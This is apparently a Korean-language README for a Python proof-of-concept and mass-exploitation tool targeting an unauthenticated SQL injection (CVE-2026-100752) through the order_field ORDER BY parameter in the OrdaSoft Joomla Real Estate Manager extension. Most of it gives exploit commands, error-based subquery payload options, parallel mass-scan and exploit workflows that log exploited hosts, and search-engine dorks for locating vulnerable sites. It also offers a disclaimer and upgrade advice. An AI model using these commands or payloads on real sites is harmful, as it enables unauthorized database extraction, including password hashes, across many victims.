
CVE-2026-100752에 대한 Python 3 PoC 및 대량 익스플로잇으로, OrdaSoft Joomla Real Estate Manager <=6.7.8의 order_field ORDER BY 파라미터를 통한 인증되지 않은 SQL 인젝션입니다.
CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) Joomla 확장 ≤ 6.7.8에 대한 Python 3 PoC. **6.7.9+**에서 수정됨.
| PoCbit | https://pocbit.org/pocs/cve-2026-100752 |
| Catalog | https://pocbit.org/pocs/ |
| Component | com_realestatemanager |
| File | site/realestatemanager.php |
| Parameter | order_field → ORDER BY (따옴표 없음, 허용 목록 없음) |
| Auth | 없음 (공개 목록 / 검색 / 카테고리 뷰) |
| CWE | CWE-89 SQL Injection |
| Also | 레거시 order_direction POST 인젝션 (Metasploit / 6.7.9 이전 감사) |
컬러 PoCbit 배너, 이어서 --mode exploit JSON 출력: exploited: true, 벡터 order_field_get, 라우트 showCategory + com_realestatemanager.

예시 명령:
python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"
(스크린샷은 승인된 테스트 환경에서 캡처되었습니다; 대상 URL은 PoC 검증용입니다.)
**Real Estate Manager (Free)**는 Joomla에서 부동산 매물 관리를 수행하는 OrdaSoft 확장입니다. 6.7.8 및 이전 버전에서 order_field 요청 파라미터가 site/realestatemanager.php 내부의 ORDER BY 절에 직접 추가됩니다; 컬럼 이름 허용 목록, 이스케이프 또는 캐스트가 없습니다. 인증 없이 카테고리 탐색, 검색 결과 및 전체 매물 목록 쿼리가 악용될 수 있습니다.
성공적인 SQLi를 통한 데이터베이스 읽기(버전, 사용자 해시, 사이트 데이터), 권한에 따른 쓰기/삭제 및 연쇄 RCE 위험을 평가해야 합니다. 6.7.9 이상 버전으로 업그레이드하십시오 (OrdaSoft security release).
Joomla 프론트 컨트롤러:
GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc
CVE-2026-100752: **order_field**가 ORDER BY 컬럼/표현식을 제어합니다. 값이 바인딩이나 검증 없이 SQL에 연결되므로 에러 기반 서브쿼리와 같은 값을 주입할 수 있습니다.
영향받는 쿼리 컨텍스트 (CVE 텍스트 기준):
showCategory 및 관련)이 PoC:
com_realestatemanager 핑거프린트 (경로 + 선택적 매니페스트 버전)catid / Itemid 스크래핑showCategory, showSearch, showSearchResult, showRent, showBuyorder_field 에러 기반 GET 및 POSTorder_direction=asc,<injection> (역사적 벡터, 일부 빌드에서 여전히 유용)hits.txtexploited.txt (성공적인 SELECT 유출이 있는 라인)cd CVE-2026-100752
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
--aggressive는 boolean/error 증명이 불충분할 때 SELECT VERSION()을 시도합니다.
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get
python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| 플래그 | 역할 |
|---|---|
--mode exploit | 에러 기반 데이터 추출 (대량 지원) |
--subquery | CONCAT(0x7e, …) 이중 쿼리 페이로드용 내부 SQL |
--vector | order_field_get, order_field_post 또는 order_direction_post 강제 |
-j | 병렬 대상 |
--no-color | 일반 터미널 |
JSONL에는 pocbit, pocbit_catalog, pocbit_page, cve, **component**가 포함됩니다.
body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"
Shodan 스타일 (지원되는 경우): http.html:com_realestatemanager
호스트 이름을 targets.txt로 내보내고 (한 줄에 URL 하나), 승인된 부동산에 대해서만 check → hits → exploit을 수행하십시오.
매니페스트 (노출된 경우):
/administrator/components/com_realestatemanager/realestatemanager.xml버전이 ≤ 6.7.8이면 → likely_vulnerable_version. ≥ 6.7.9이면 → patched_version (exploit이 여전히 실패할 수 있음).
| CVE | 유형 | 수정 버전 |
|---|---|---|
| CVE-2026-100752 | 인증되지 않은 SQLi (order_field) | 6.7.9 |
| CVE-2026-100753 | 반사형 XSS (공개 매물 뷰) | 6.7.9 |
동일 벤더 배치 (2026년 9월): Vehicle Manager 및 기타 OrdaSoft 확장이 별도의 CVE를 받았습니다 — 실행 중인 모든 OrdaSoft 컴포넌트를 패치하십시오.
auxiliary/gather/joomla_com_realestatemanager_sqli (레거시 order_direction POST)승인된 보안 테스트 및 패치 검증 전용입니다. 허가 없이 시스템에 사용하지 마십시오.
CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752